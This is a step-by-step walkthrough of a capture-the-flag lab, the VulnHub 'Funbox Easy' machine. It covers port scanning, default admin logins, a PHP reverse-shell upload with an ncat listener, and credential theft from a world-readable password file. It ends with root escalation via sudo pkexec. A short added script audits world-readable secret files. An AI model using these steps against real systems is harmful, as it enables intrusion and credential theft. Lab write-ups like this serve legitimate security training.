https://www.vulnhub.com/entry/funbox-easy,526/
Setting up Target System
- extract the ova file using
    tar -xvf Funbox3.ova
  There will be a vmdk file (VMware disk image) in it; convert it to qcow2 using
    qemu-img convert -p -f vmdk -O qcow2 Funbox3-disk001.vmdk funbox3.qcow2
- create a new VM using the existing image, and import that funbox3.qcow2
- make sure it is using BIOS boot; UEFI didn't work
Scan Network
Get target IP:
- ping scan
    nmap -sn 192.168.122.1-255
- or
    netdiscover -P -i eth0 -r 192.168.122.1/24
Scan Ports
    nmap -p- -sV -sC 192.168.122.14
Port 80 http is Open
- check the website
- check robots.txt
- inspect elements
- scan directories
    dirb http://192.168.122.14
  found:
    http://192.168.122.14/index.php
    http://192.168.122.14/admin/index.php
    http://192.168.122.14/store/admin.php
- try the default login "admin admin", and able to get into the book store backend
Website is running PHP, so we can try to use a PHP script to get a reverse web shell
- locate the PHP reverse shell on the attacker machine
    updatedb && locate php-reverse-shell.php
  found:
    /usr/share/webshells/php/php-reverse-shell.php
- copy it somewhere else, edit the IP to the attacker's and the port to anything
- open a listening port on the attacker machine on that port
    ncat -nvlp 314
- add a new book at
    http://192.168.122.14/store/admin_add.php
  and drop in the php-reverse-shell.php
- now we have a reverse shell when we open the new book
Spawn a better shell
- check if python exists on the machine
    which python3
- spawn a new bash shell
    python3 -c 'import pty;pty.spawn("/bin/bash")'
- now we have a proper bash shell
Now we are in that system's shell, gather some info
- check OS version
    uname -a
- find out current user id
    whoami
- find user and group id
    id
- find out all users on the machine, check
    /etc/passwd
- check out the other user tony's home; found a password.txt file that is readable by all users
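A defender-side check for the finding above, added here as an example and not part of the walkthrough: a POSIX shell script that lists files under a home-directory tree readable by "other", narrows them to credential-looking names such as password.txt, and can strip the "other" read bit from them. The name pattern and the script name audit_home.sh are assumptions.

```shell
#!/bin/sh
# Added audit helper (not part of the walkthrough): the foothold came from a
# world-readable password.txt in another user's home, so this lists every
# regular file under a tree that grants read access to "other" (mode bit 004),
# narrows the list to credential-looking file names, and optionally fixes them.
# Assumes POSIX find(1), grep -E and chmod; the name pattern is an assumption.

# All regular files under $1 readable by "other", sorted.
world_readable_files() {
    find "$1" -type f -perm -004 2>/dev/null | sort
}

# Subset whose base name looks like a credential store (password.txt, .env, ...).
# The pattern is anchored to the last path component so a directory name
# such as "credentials/" does not match every file inside it.
world_readable_secret_candidates() {
    world_readable_files "$1" | grep -Ei '(pass|secret|cred)[^/]*$|/\.env$' || true
}

# Remove the "other" read bit from each candidate and report what changed.
restrict_secret_candidates() {
    world_readable_secret_candidates "$1" | while IFS= read -r f; do
        chmod o-r "$f" && printf 'restricted: %s\n' "$f"
    done
}

# Usage: ./audit_home.sh /home [--fix]   (script name is an assumption)
if [ "$#" -gt 0 ]; then
    if [ "$2" = "--fix" ]; then
        restrict_secret_candidates "$1"
    else
        world_readable_secret_candidates "$1"
    fi
fi
```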
Try the passwords
- able to log in to
    http://192.168.122.14/admin/home.php
  with admin asdfghjklXXX
- able to SSH into the machine with
    tony yxcvbnmYYY
SSH into the machine
- check out the current user's groups
    groups tony
- or
    id
- user is in the sudo group
- check all commands the user may run with sudo
    sudo -l
- look up possible privilege escalation from
    https://gtfobins.github.io/
  pkexec and time could work;
    sudo pkexec /bin/bash
  will spawn a shell
Capture the Flag
- now you are in bash as root; go to /root
    cat /root/root.flag